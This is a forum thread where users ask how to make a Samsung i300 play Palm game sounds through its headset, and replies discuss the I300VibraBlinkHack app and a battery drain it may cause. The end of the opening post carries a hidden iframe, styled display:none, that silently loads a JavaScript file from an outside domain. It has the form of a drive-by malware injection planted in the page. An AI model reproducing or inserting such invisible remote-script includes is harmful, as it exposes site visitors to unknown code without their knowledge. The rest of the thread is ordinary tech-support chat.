+ Reply to Thread

Question Help? How send all palm sounds through headset?

The Samsung i300 has a handy dandy headset jack for using the phone, but when I have a headset plugged into the jack the palm sounds play on the main speaker. How do I force the i300 to send the Palm's sounds through the headset jack? Basically I want to play a game and have the sounds go through the headset and have no one else hear it.

Is there a setting? Is there a hack? (If neither, there SHOULD be a hack). Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

cant do it. your best bet is to just turn off game sounds.

I thought I300VibraBlinkHack from PDA Apps did exactly this-- re-direct all Palm Sounds to the phone's speaker.

Spiderman

Administrator

Arrow

not sure if it does or not. i know out of the box you cant do this, but it could be 'hackable'...

Does anyone use I300VibraBlinkHack from PDA Apps? Could you hook up a headset and test to see if the palm sounds now go through your headset?

PS. I'd try it myself but I just had a demo version of the I300VibraBlinkHack and it's expired. Thanks!

what vibra link hack does is make the phone vibrate when you have a palm alarm, reminder etc. normally the vibrate doesn't work on the palm events, but it doesn't redirect sounds

Jorge

I tried the original vibralinkhack but there was some sort of conflict that kept the light on and drained the battery. If that's been fixed I'd like to try it again.
    The older I get, the better I was...

Originally posted by h_eisenson
    I tried the original vibralinkhack but there was some sort of conflict that kept the light on and drained the battery. If that's been fixed I'd like to try it again.
    You know, now that you mention it, I think I know why my battery died the other night, I unplugged the charger to plug in my laptop, and forgot to plug it in again, when I woke up, the phone was dead, and normally, even if I don't chrge it every night, it lasts at least till midday. hhmmm. I'll check it out and let you know.

Jorge